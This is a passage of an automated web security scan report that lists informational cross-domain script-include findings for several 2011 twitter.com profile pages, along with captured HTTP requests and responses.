http://a3.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611745
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:31:01 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664261-87462-50135
ETag: "5f45ef66819fc84bcaf71a2a6f94e92d"
Last-Modified: Wed, 02 Feb 2011 16:31:01 GMT
X-Runtime: 0.03195
Content-Type: text/html; charset=utf-8
Content-Length: 57147
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/twitter.js?1296611745" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611745" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611745" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/geov1.js?1296611745" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/api.js?1296611745" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/dismissable.js?1296611745" type="text/javascript"></script>
...[SNIP]...

18.265. http://twitter.com/NoReservations previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/NoReservations

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/dismissable.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/geov1.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/twitter.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/api.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611745
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:30:57 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664257-66115-20192
ETag: "89e7ee48646735c7592d00825b5abd19"
Last-Modified: Wed, 02 Feb 2011 16:30:57 GMT
X-Runtime: 0.01105
Content-Type: text/html; charset=utf-8
Content-Length: 49945
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/twitter.js?1296611745" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611745" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611745" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/geov1.js?1296611745" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/api.js?1296611745" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/dismissable.js?1296611745" type="text/javascript"></script>
...[SNIP]...

18.266. http://twitter.com/NylonMag previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/NylonMag

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296609216/javascripts/api.js?1296615671
http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296615671
http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296615671
http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671
http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296615671
http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296615671
http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296615671
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:31:20 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664280-36838-58412
ETag: "0b590a3dc5cc41a9895f051ee0a92400"
Last-Modified: Wed, 02 Feb 2011 16:31:20 GMT
X-Runtime: 0.01176
Content-Type: text/html; charset=utf-8
Content-Length: 53767
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296615671" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296615671" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296615671" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296615671" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/api.js?1296615671" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296615671" type="text/javascript"></script>
...[SNIP]...

18.267. http://twitter.com/OmnitureEMEA previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/OmnitureEMEA

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1.twimg.com/a/1296609216/javascripts/api.js?1296614487
http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296614487
http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296614487
http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296614487
http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296614487
http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296614487
http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296614487
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:30:02 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664202-7552-57855
ETag: "51ec95abb661a6cd91d62d99e190788c"
Last-Modified: Wed, 02 Feb 2011 16:30:02 GMT
X-Runtime: 0.01967
Content-Type: text/html; charset=utf-8
Content-Length: 53682
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzciCmZsYXNoSUM6J0FjdGlvbkNvbnRy%250Ab2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6B2lkIiUwZWU5%250AYmE5M2IzN2U4M2Y4NTU1ODc1MGJjZTQ2Y2E4OToVaW5fbmV3X3VzZXJfZmxv%250AdzA%253D--5d5e0cde97546ff3bb3adffea964a59e2e281451; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296614487" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296614487" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296614487" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296614487" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296614487" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/api.js?1296614487" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296614487" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296614487" type="text/javascript"></script>
...[SNIP]...

18.268. http://twitter.com/PeaceCorps previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/PeaceCorps

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/dismissable.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/geov1.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/twitter.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/api.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611745
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:31:18 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664278-24496-1442
ETag: "78f8a1f0d0b595c8c94e3884671db7ad"
Last-Modified: Wed, 02 Feb 2011 16:31:18 GMT
X-Runtime: 0.01473
Content-Type: text/html; charset=utf-8
Content-Length: 54541
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/twitter.js?1296611745" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611745" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611745" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/geov1.js?1296611745" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/api.js?1296611745" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/dismissable.js?1296611745" type="text/javascript"></script>
...[SNIP]...

18.269. http://twitter.com/Support previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/Support

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1.twimg.com/a/1296525272/javascripts/api.js?1296527758
http://a1.twimg.com/a/1296525272/javascripts/lib/gears_init.js?1296527758
http://a1.twimg.com/a/1296525272/javascripts/lib/jquery.tipsy.min.js?1296527758
http://a2.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296527758
http://a3.twimg.com/a/1296525272/javascripts/dismissable.js?1296527758
http://a3.twimg.com/a/1296525272/javascripts/geov1.js?1296527758
http://a3.twimg.com/a/1296525272/javascripts/twitter.js?1296527758
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:31:24 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664284-81346-20204
ETag: "bbc963b9f8160e0d6823853732c92a86"
Last-Modified: Wed, 02 Feb 2011 16:31:24 GMT
X-Runtime: 0.01293
Content-Type: text/html; charset=utf-8
Content-Length: 51194
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296525272/javascripts/twitter.js?1296527758" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/lib/jquery.tipsy.min.js?1296527758" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/lib/gears_init.js?1296527758" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296527758" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296525272/javascripts/geov1.js?1296527758" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/api.js?1296527758" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296527758" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296525272/javascripts/dismissable.js?1296527758" type="text/javascript"></script>
...[SNIP]...

18.270. http://twitter.com/TakeoSpikes51 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/TakeoSpikes51

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296609216/javascripts/api.js?1296615671
http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296615671
http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296615671
http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671
http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296615671
http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296615671
http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296615671
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:31:10 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664270-56148-48294
ETag: "135d64f3474b3baffd997b3100ea7ef1"
Last-Modified: Wed, 02 Feb 2011 16:31:10 GMT
X-Runtime: 0.03086
Content-Type: text/html; charset=utf-8
Content-Length: 49981
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296615671" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296615671" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296615671" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296615671" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/api.js?1296615671" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296615671" type="text/javascript"></script>
...[SNIP]...

18.271. http://twitter.com/TomorrowCounsel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/TomorrowCounsel

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1.twimg.com/a/1296525272/javascripts/api.js?1296527758
http://a1.twimg.com/a/1296525272/javascripts/lib/gears_init.js?1296527758
http://a1.twimg.com/a/1296525272/javascripts/lib/jquery.tipsy.min.js?1296527758
http://a2.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296527758
http://a3.twimg.com/a/1296525272/javascripts/dismissable.js?1296527758
http://a3.twimg.com/a/1296525272/javascripts/geov1.js?1296527758
http://a3.twimg.com/a/1296525272/javascripts/twitter.js?1296527758
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /TomorrowCounsel HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 01 Feb 2011 14:32:47 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296570767-53246-29178
ETag: "4a914da96ee0a0a88be17c95038f30f6"
Last-Modified: Tue, 01 Feb 2011 14:32:47 GMT
X-Runtime: 0.00895
Content-Type: text/html; charset=utf-8
Content-Length: 38185
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296570765453649; path=/; expires=Tue, 08-Feb-11 14:32:45 GMT; domain=.twitter.com
Set-Cookie: guest_id=129657076796626435; path=/; expires=Thu, 03 Mar 2011 14:32:47 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTRkZWU5Mzk3OTY5YzNlY2U3NmEzNjRkYTVjNWM4ZmE4Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIX9qj4S0B--75323e6281d6e07fad52c4d2694e81f66908fdb8; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296525272/javascripts/twitter.js?1296527758" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/lib/jquery.tipsy.min.js?1296527758" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/lib/gears_init.js?1296527758" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296527758" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296525272/javascripts/geov1.js?1296527758" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/api.js?1296527758" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296527758" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296525272/javascripts/dismissable.js?1296527758" type="text/javascript"></script>
...[SNIP]...

18.272. http://twitter.com/TomorrowCounsel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/TomorrowCounsel

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296609216/javascripts/api.js?1296611148
http://a0.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611148
http://a0.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611148
http://a1.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611148
http://a2.twimg.com/a/1296609216/javascripts/dismissable.js?1296611148
http://a2.twimg.com/a/1296609216/javascripts/geov1.js?1296611148
http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296611148
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /TomorrowCounsel HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:25:52 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296663951-21616-40349
ETag: "5579277454dfc4d9019468d0efbf54b4"
Last-Modified: Wed, 02 Feb 2011 16:25:51 GMT
X-Runtime: 0.01367
Content-Type: text/html; charset=utf-8
Content-Length: 38201
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
